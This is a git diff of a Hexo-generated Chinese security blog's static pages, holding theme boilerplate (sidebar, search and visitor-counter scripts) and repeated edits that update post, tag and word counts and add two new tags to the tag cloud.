+      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
+    </div>
+  </div>
+
+  <aside id="sidebar" class="sidebar">
+    
+    <div class="sidebar-inner">
+
+      
+
+      
+
+      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
+        <div class="site-overview">
+          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
+            
+              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
+            
+              <p class="site-author-name" itemprop="name">Cool-Y</p>
+              <p class="site-description motion-element" itemprop="description"></p>
+          </div>
+
+          <nav class="site-state motion-element">
+
+            
+              <div class="site-state-item site-state-posts">
+              
+                <a href="/archives/">
+              
+                  <span class="site-state-item-count">16</span>
+                  <span class="site-state-item-name">日志</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-categories">
+                <a href="/categories/index.html">
+                  <span class="site-state-item-count">6</span>
+                  <span class="site-state-item-name">分类</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-tags">
+                <a href="/tags/index.html">
+                  <span class="site-state-item-count">31</span>
+                  <span class="site-state-item-name">标签</span>
+                </a>
+              </div>
+            
+
+          </nav>
+
+          
+
+          
+            <div class="links-of-author motion-element">
+                
+                  <span class="links-of-author-item">
+                    <a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
+                      
+                        <i class="fa fa-fw fa-github"></i>GitHub</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
+                      
+                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
+                      
+                        <i class="fa fa-fw fa-instagram"></i>Instagram</a>
+                  </span>
+                
+            </div>
+          
+
+          
+          
+
+          
+          
+
+          
+
+        </div>
+      </section>
+
+      
+
+      
+
+    </div>
+  </aside>
+
+
+        
+      </div>
+    </main>
+
+    <footer id="footer" class="footer">
+      <div class="footer-inner">
+        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
+  <span class="with-love">
+    <i class="fa fa-user"></i>
+  </span>
+  <span class="author" itemprop="copyrightHolder">Cool-Y</span>
+
+  
+    <span class="post-meta-divider">|</span>
+    <span class="post-meta-item-icon">
+      <i class="fa fa-area-chart"></i>
+    </span>
+    
+    <span title="Site words total count">44.8k</span>
+  
+</div>
+
+
+  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
+
+
+
+
+
+
+
+
+        
+<div class="busuanzi-count">
+    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
+
+  
+    <span class="site-uv">
+      <i class="fa fa-user"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
+      
+    </span>
+  
+
+  
+    <span class="site-pv">
+      <i class="fa fa-eye"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
+      
+    </span>
+  
+</div>
+
+
+
+
+
+
+
+
+        
+      </div>
+    </footer>
+
+    
+      <div class="back-to-top">
+        <i class="fa fa-arrow-up"></i>
+        
+      </div>
+    
+
+    
+
+  </div>
+
+  
+
+<script type="text/javascript">
+  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
+    window.Promise = null;
+  }
+</script>
+
+
+
+
+
+
+
+
+
+  
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
+  
+
+
+  
+
+
+  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
+
+
+
+  
+  
+
+
+  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>
+
+
+
+  
+
+  
+
+
+  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
+
+
+
+  
+
+
+  
+
+
+
+
+	
+
+
+
+
+
+  
+
+
+
+
+
+  
+
+
+
+
+
+
+
+<!-- LOCAL: You can save these files to your site and update links -->
+    
+        
+        <link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
+        <script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
+    
+<!-- END LOCAL -->
+
+    
+
+    
+
+
+
+
+
+
+
+  
+
+  <script type="text/javascript">
+    // Popup Window;
+    var isfetched = false;
+    var isXml = true;
+    // Search DB path;
+    var search_path = "search.xml";
+    if (search_path.length === 0) {
+      search_path = "search.xml";
+    } else if (/json$/i.test(search_path)) {
+      isXml = false;
+    }
+    var path = "/" + search_path;
+    // monitor main search box;
+
+    var onPopupClose = function (e) {
+      $('.popup').hide();
+      $('#local-search-input').val('');
+      $('.search-result-list').remove();
+      $('#no-result').remove();
+      $(".local-search-pop-overlay").remove();
+      $('body').css('overflow', '');
+    }
+
+    function proceedsearch() {
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
+        .css('overflow', 'hidden');
+      $('.search-popup-overlay').click(onPopupClose);
+      $('.popup').toggle();
+      var $localSearchInput = $('#local-search-input');
+      $localSearchInput.attr("autocapitalize", "none");
+      $localSearchInput.attr("autocorrect", "off");
+      $localSearchInput.focus();
+    }
+
+    // search function;
+    var searchFunc = function(path, search_id, content_id) {
+      'use strict';
+
+      // start loading animation
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
+          '<div id="search-loading-icon">' +
+          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
+          '</div>' +
+          '</div>')
+        .css('overflow', 'hidden');
+      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');
+
+      $.ajax({
+        url: path,
+        dataType: isXml ? "xml" : "json",
+        async: true,
+        success: function(res) {
+          // get the contents from search data
+          isfetched = true;
+          $('.popup').detach().appendTo('.header-inner');
+          var datas = isXml ? $("entry", res).map(function() {
+            return {
+              title: $("title", this).text(),
+              content: $("content",this).text(),
+              url: $("url" , this).text()
+            };
+          }).get() : res;
+          var input = document.getElementById(search_id);
+          var resultContent = document.getElementById(content_id);
+          var inputEventFunction = function() {
+            var searchText = input.value.trim().toLowerCase();
+            var keywords = searchText.split(/[\s\-]+/);
+            if (keywords.length > 1) {
+              keywords.push(searchText);
+            }
+            var resultItems = [];
+            if (searchText.length > 0) {
+              // perform local searching
+              datas.forEach(function(data) {
+                var isMatch = false;
+                var hitCount = 0;
+                var searchTextCount = 0;
+                var title = data.title.trim();
+                var titleInLowerCase = title.toLowerCase();
+                var content = data.content.trim().replace(/<[^>]+>/g,"");
+                var contentInLowerCase = content.toLowerCase();
+                var articleUrl = decodeURIComponent(data.url);
+                var indexOfTitle = [];
+                var indexOfContent = [];
+                // only match articles with not empty titles
+                if(title != '') {
+                  keywords.forEach(function(keyword) {
+                    function getIndexByWord(word, text, caseSensitive) {
+                      var wordLen = word.length;
+                      if (wordLen === 0) {
+                        return [];
+                      }
+                      var startPosition = 0, position = [], index = [];
+                      if (!caseSensitive) {
+                        text = text.toLowerCase();
+                        word = word.toLowerCase();
+                      }
+                      while ((position = text.indexOf(word, startPosition)) > -1) {
+                        index.push({position: position, word: word});
+                        startPosition = position + wordLen;
+                      }
+                      return index;
+                    }
+
+                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
+                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
+                  });
+                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
+                    isMatch = true;
+                    hitCount = indexOfTitle.length + indexOfContent.length;
+                  }
+                }
+
+                // show search results
+
+                if (isMatch) {
+                  // sort index by position of keyword
+
+                  [indexOfTitle, indexOfContent].forEach(function (index) {
+                    index.sort(function (itemLeft, itemRight) {
+                      if (itemRight.position !== itemLeft.position) {
+                        return itemRight.position - itemLeft.position;
+                      } else {
+                        return itemLeft.word.length - itemRight.word.length;
+                      }
+                    });
+                  });
+
+                  // merge hits into slices
+
+                  function mergeIntoSlice(text, start, end, index) {
+                    var item = index[index.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    var hits = [];
+                    var searchTextCountInSlice = 0;
+                    while (position + word.length <= end && index.length != 0) {
+                      if (word === searchText) {
+                        searchTextCountInSlice++;
+                      }
+                      hits.push({position: position, length: word.length});
+                      var wordEnd = position + word.length;
+
+                      // move to next position of hit
+
+                      index.pop();
+                      while (index.length != 0) {
+                        item = index[index.length - 1];
+                        position = item.position;
+                        word = item.word;
+                        if (wordEnd > position) {
+                          index.pop();
+                        } else {
+                          break;
+                        }
+                      }
+                    }
+                    searchTextCount += searchTextCountInSlice;
+                    return {
+                      hits: hits,
+                      start: start,
+                      end: end,
+                      searchTextCount: searchTextCountInSlice
+                    };
+                  }
+
+                  var slicesOfTitle = [];
+                  if (indexOfTitle.length != 0) {
+                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
+                  }
+
+                  var slicesOfContent = [];
+                  while (indexOfContent.length != 0) {
+                    var item = indexOfContent[indexOfContent.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    // cut out 100 characters
+                    var start = position - 20;
+                    var end = position + 80;
+                    if(start < 0){
+                      start = 0;
+                    }
+                    if (end < position + word.length) {
+                      end = position + word.length;
+                    }
+                    if(end > content.length){
+                      end = content.length;
+                    }
+                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
+                  }
+
+                  // sort slices in content by search text's count and hits' count
+
+                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
+                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
+                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
+                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
+                      return sliceRight.hits.length - sliceLeft.hits.length;
+                    } else {
+                      return sliceLeft.start - sliceRight.start;
+                    }
+                  });
+
+                  // select top N slices in content
+
+                  var upperBound = parseInt('1');
+                  if (upperBound >= 0) {
+                    slicesOfContent = slicesOfContent.slice(0, upperBound);
+                  }
+
+                  // highlight title and content
+
+                  function highlightKeyword(text, slice) {
+                    var result = '';
+                    var prevEnd = slice.start;
+                    slice.hits.forEach(function (hit) {
+                      result += text.substring(prevEnd, hit.position);
+                      var end = hit.position + hit.length;
+                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
+                      prevEnd = end;
+                    });
+                    result += text.substring(prevEnd, slice.end);
+                    return result;
+                  }
+
+                  var resultItem = '';
+
+                  if (slicesOfTitle.length != 0) {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
+                  } else {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
+                  }
+
+                  slicesOfContent.forEach(function (slice) {
+                    resultItem += "<a href='" + articleUrl + "'>" +
+                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
+                      "...</p>" + "</a>";
+                  });
+
+                  resultItem += "</li>";
+                  resultItems.push({
+                    item: resultItem,
+                    searchTextCount: searchTextCount,
+                    hitCount: hitCount,
+                    id: resultItems.length
+                  });
+                }
+              })
+            };
+            if (keywords.length === 1 && keywords[0] === "") {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
+            } else if (resultItems.length === 0) {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
+            } else {
+              resultItems.sort(function (resultLeft, resultRight) {
+                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
+                  return resultRight.searchTextCount - resultLeft.searchTextCount;
+                } else if (resultLeft.hitCount !== resultRight.hitCount) {
+                  return resultRight.hitCount - resultLeft.hitCount;
+                } else {
+                  return resultRight.id - resultLeft.id;
+                }
+              });
+              var searchResultList = '<ul class=\"search-result-list\">';
+              resultItems.forEach(function (result) {
+                searchResultList += result.item;
+              })
+              searchResultList += "</ul>";
+              resultContent.innerHTML = searchResultList;
+            }
+          }
+
+          if ('auto' === 'auto') {
+            input.addEventListener('input', inputEventFunction);
+          } else {
+            $('.search-icon').click(inputEventFunction);
+            input.addEventListener('keypress', function (event) {
+              if (event.keyCode === 13) {
+                inputEventFunction();
+              }
+            });
+          }
+
+          // remove loading animation
+          $(".local-search-pop-overlay").remove();
+          $('body').css('overflow', '');
+
+          proceedsearch();
+        }
+      });
+    }
+
+    // handle and trigger popup window;
+    $('.popup-trigger').click(function(e) {
+      e.stopPropagation();
+      if (isfetched === false) {
+        searchFunc(path, 'local-search-input', 'local-search-result');
+      } else {
+        proceedsearch();
+      };
+    });
+
+    $('.popup-btn-close').click(onPopupClose);
+    $('.popup').click(function(e){
+      e.stopPropagation();
+    });
+    $(document).on('keyup', function (event) {
+      var shouldDismissSearchPopup = event.which === 27 &&
+        $('.search-popup').is(':visible');
+      if (shouldDismissSearchPopup) {
+        onPopupClose();
+      }
+    });
+  </script>
+
+
+
+
+
+  
+
+  
+  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
+  <script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
+  <script>
+    function showTime(Counter) {
+      var query = new AV.Query(Counter);
+      var entries = [];
+      var $visitors = $(".leancloud_visitors");
+
+      $visitors.each(function () {
+        entries.push( $(this).attr("id").trim() );
+      });
+
+      query.containedIn('url', entries);
+      query.find()
+        .done(function (results) {
+          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
+
+          if (results.length === 0) {
+            $visitors.find(COUNT_CONTAINER_REF).text(0);
+            return;
+          }
+
+          for (var i = 0; i < results.length; i++) {
+            var item = results[i];
+            var url = item.get('url');
+            var time = item.get('time');
+            var element = document.getElementById(url);
+
+            $(element).find(COUNT_CONTAINER_REF).text(time);
+          }
+          for(var i = 0; i < entries.length; i++) {
+            var url = entries[i];
+            var element = document.getElementById(url);
+            var countSpan = $(element).find(COUNT_CONTAINER_REF);
+            if( countSpan.text() == '') {
+              countSpan.text(0);
+            }
+          }
+        })
+        .fail(function (object, error) {
+          console.log("Error: " + error.code + " " + error.message);
+        });
+    }
+
+    function addCount(Counter) {
+      var $visitors = $(".leancloud_visitors");
+      var url = $visitors.attr('id').trim();
+      var title = $visitors.attr('data-flag-title').trim();
+      var query = new AV.Query(Counter);
+
+      query.equalTo("url", url);
+      query.find({
+        success: function(results) {
+          if (results.length > 0) {
+            var counter = results[0];
+            counter.fetchWhenSave(true);
+            counter.increment("time");
+            counter.save(null, {
+              success: function(counter) {
+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(counter.get('time'));
+              },
+              error: function(counter, error) {
+                console.log('Failed to save Visitor num, with error message: ' + error.message);
+              }
+            });
+          } else {
+            var newcounter = new Counter();
+            /* Set ACL */
+            var acl = new AV.ACL();
+            acl.setPublicReadAccess(true);
+            acl.setPublicWriteAccess(true);
+            newcounter.setACL(acl);
+            /* End Set ACL */
+            newcounter.set("title", title);
+            newcounter.set("url", url);
+            newcounter.set("time", 1);
+            newcounter.save(null, {
+              success: function(newcounter) {
+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
+              },
+              error: function(newcounter, error) {
+                console.log('Failed to create');
+              }
+            });
+          }
+        },
+        error: function(error) {
+          console.log('Error:' + error.code + " " + error.message);
+        }
+      });
+    }
+
+    $(function() {
+      var Counter = AV.Object.extend("Counter");
+      if ($('.leancloud_visitors').length == 1) {
+        addCount(Counter);
+      } else if ($('.post-title-link').length > 1) {
+        showTime(Counter);
+      }
+    });
+  </script>
+
+
+
+  
+
+  
+<script>
+(function(){
+    var bp = document.createElement('script');
+    var curProtocol = window.location.protocol.split(':')[0];
+    if (curProtocol === 'https') {
+        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
+    }
+    else {
+        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
+    }
+    var s = document.getElementsByTagName("script")[0];
+    s.parentNode.insertBefore(bp, s);
+})();
+</script>
+
+
+  
+  
+
+  
+
+  
+
+  
+
+</body>
+</html>
diff --git a/tags/USENIX/index.html b/tags/USENIX/index.html
index a3bbfbef..cf993403 100644
--- a/tags/USENIX/index.html
+++ b/tags/USENIX/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/index.html b/tags/index.html
index 47142c2c..03764dc6 100644
--- a/tags/index.html
+++ b/tags/index.html
@@ -308,10 +308,10 @@
         
           <div class="tag-cloud">
             <div class="tag-cloud-title">
-                目前共计 29 个标签
+                目前共计 31 个标签
             </div>
             <div class="tag-cloud-tags">
-              <a href="/tags/CVE/" style="font-size: 12px; color: #ccc">CVE</a> <a href="/tags/MiniUPnP/" style="font-size: 12px; color: #ccc">MiniUPnP</a> <a href="/tags/PE/" style="font-size: 12px; color: #ccc">PE</a> <a href="/tags/QQ/" style="font-size: 12px; color: #ccc">QQ</a> <a href="/tags/SSH/" style="font-size: 12px; color: #ccc">SSH</a> <a href="/tags/Samba/" style="font-size: 12px; color: #ccc">Samba</a> <a href="/tags/USENIX/" style="font-size: 12px; color: #ccc">USENIX</a> <a href="/tags/itchat/" style="font-size: 12px; color: #ccc">itchat</a> <a href="/tags/miio/" style="font-size: 12px; color: #ccc">miio</a> <a href="/tags/python/" style="font-size: 12px; color: #ccc">python</a> <a href="/tags/wifi/" style="font-size: 12px; color: #ccc">wifi</a> <a href="/tags/中间人/" style="font-size: 12px; color: #ccc">中间人</a> <a href="/tags/侧信道攻击/" style="font-size: 12px; color: #ccc">侧信道攻击</a> <a href="/tags/取证/" style="font-size: 12px; color: #ccc">取证</a> <a href="/tags/复原文件/" style="font-size: 12px; color: #ccc">复原文件</a> <a href="/tags/密码/" style="font-size: 12px; color: #ccc">密码</a> <a href="/tags/小米/" style="font-size: 30px; color: #111">小米</a> <a href="/tags/微信/" style="font-size: 12px; color: #ccc">微信</a> <a href="/tags/数据库/" style="font-size: 21px; color: #6f6f6f">数据库</a> <a href="/tags/数据挖掘/" style="font-size: 12px; color: #ccc">数据挖掘</a> <a href="/tags/文件格式/" style="font-size: 21px; color: #6f6f6f">文件格式</a> <a href="/tags/模型实现/" style="font-size: 12px; color: #ccc">模型实现</a> <a href="/tags/破解/" style="font-size: 12px; color: #ccc">破解</a> <a href="/tags/自然语言处理/" style="font-size: 12px; color: #ccc">自然语言处理</a> <a href="/tags/访问控制/" style="font-size: 12px; color: #ccc">访问控制</a> <a href="/tags/路由器/" style="font-size: 12px; color: #ccc">路由器</a> <a href="/tags/远程执行/" style="font-size: 12px; color: #ccc">远程执行</a> <a href="/tags/逆向/" style="font-size: 12px; color: #ccc">逆向</a> <a href="/tags/重放攻击/" style="font-size: 12px; color: #ccc">重放攻击</a>
+              <a href="/tags/CVE/" style="font-size: 12px; color: #ccc">CVE</a> <a href="/tags/MiniUPnP/" style="font-size: 12px; color: #ccc">MiniUPnP</a> <a href="/tags/PE/" style="font-size: 12px; color: #ccc">PE</a> <a href="/tags/QQ/" style="font-size: 12px; color: #ccc">QQ</a> <a href="/tags/SSH/" style="font-size: 12px; color: #ccc">SSH</a> <a href="/tags/Samba/" style="font-size: 12px; color: #ccc">Samba</a> <a href="/tags/TCPDUMP/" style="font-size: 12px; color: #ccc">TCPDUMP</a> <a href="/tags/USENIX/" style="font-size: 12px; color: #ccc">USENIX</a> <a href="/tags/itchat/" style="font-size: 12px; color: #ccc">itchat</a> <a href="/tags/miio/" style="font-size: 12px; color: #ccc">miio</a> <a href="/tags/python/" style="font-size: 12px; color: #ccc">python</a> <a href="/tags/wifi/" style="font-size: 12px; color: #ccc">wifi</a> <a href="/tags/中间人/" style="font-size: 12px; color: #ccc">中间人</a> <a href="/tags/侧信道攻击/" style="font-size: 12px; color: #ccc">侧信道攻击</a> <a href="/tags/取证/" style="font-size: 12px; color: #ccc">取证</a> <a href="/tags/复原文件/" style="font-size: 12px; color: #ccc">复原文件</a> <a href="/tags/密码/" style="font-size: 12px; color: #ccc">密码</a> <a href="/tags/小米/" style="font-size: 30px; color: #111">小米</a> <a href="/tags/微信/" style="font-size: 12px; color: #ccc">微信</a> <a href="/tags/拒绝服务攻击/" style="font-size: 12px; color: #ccc">拒绝服务攻击</a> <a href="/tags/数据库/" style="font-size: 21px; color: #6f6f6f">数据库</a> <a href="/tags/数据挖掘/" style="font-size: 12px; color: #ccc">数据挖掘</a> <a href="/tags/文件格式/" style="font-size: 21px; color: #6f6f6f">文件格式</a> <a href="/tags/模型实现/" style="font-size: 12px; color: #ccc">模型实现</a> <a href="/tags/破解/" style="font-size: 12px; color: #ccc">破解</a> <a href="/tags/自然语言处理/" style="font-size: 12px; color: #ccc">自然语言处理</a> <a href="/tags/访问控制/" style="font-size: 12px; color: #ccc">访问控制</a> <a href="/tags/路由器/" style="font-size: 12px; color: #ccc">路由器</a> <a href="/tags/远程执行/" style="font-size: 12px; color: #ccc">远程执行</a> <a href="/tags/逆向/" style="font-size: 12px; color: #ccc">逆向</a> <a href="/tags/重放攻击/" style="font-size: 12px; color: #ccc">重放攻击</a>
             </div>
           </div>
         
@@ -369,7 +369,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -391,7 +391,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -462,7 +462,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/itchat/index.html b/tags/itchat/index.html
index aeb59b7a..3c14a99a 100644
--- a/tags/itchat/index.html
+++ b/tags/itchat/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/miio/index.html b/tags/miio/index.html
index ad8f4b71..ffb91e4c 100644
--- a/tags/miio/index.html
+++ b/tags/miio/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/python/index.html b/tags/python/index.html
index 392216a5..31cab452 100644
--- a/tags/python/index.html
+++ b/tags/python/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/wifi/index.html b/tags/wifi/index.html
index 946291b4..3fc6a2dd 100644
--- a/tags/wifi/index.html
+++ b/tags/wifi/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/中间人/index.html b/tags/中间人/index.html
index 876fc6d6..beb38ea3 100644
--- a/tags/中间人/index.html
+++ b/tags/中间人/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/侧信道攻击/index.html b/tags/侧信道攻击/index.html
index e51a6720..f5f0076c 100644
--- a/tags/侧信道攻击/index.html
+++ b/tags/侧信道攻击/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/取证/index.html b/tags/取证/index.html
index 1b25d72a..343b1d9b 100644
--- a/tags/取证/index.html
+++ b/tags/取证/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/复原文件/index.html b/tags/复原文件/index.html
index 1ccd9ac7..6647acaf 100644
--- a/tags/复原文件/index.html
+++ b/tags/复原文件/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/密码/index.html b/tags/密码/index.html
index 7649e9f0..d6ecde32 100644
--- a/tags/密码/index.html
+++ b/tags/密码/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
